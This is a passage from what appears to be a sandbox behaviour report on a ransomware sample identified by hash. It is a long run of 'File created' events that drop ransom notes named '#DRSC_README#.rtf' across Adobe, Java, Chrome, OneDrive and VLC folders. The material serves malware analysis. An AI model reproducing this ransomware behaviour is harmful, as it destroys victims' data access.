(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G5LNRDQJ\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\db\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Libraries\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\km-KH\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\features\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\yo-NG\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zu-ZA\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Documents\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 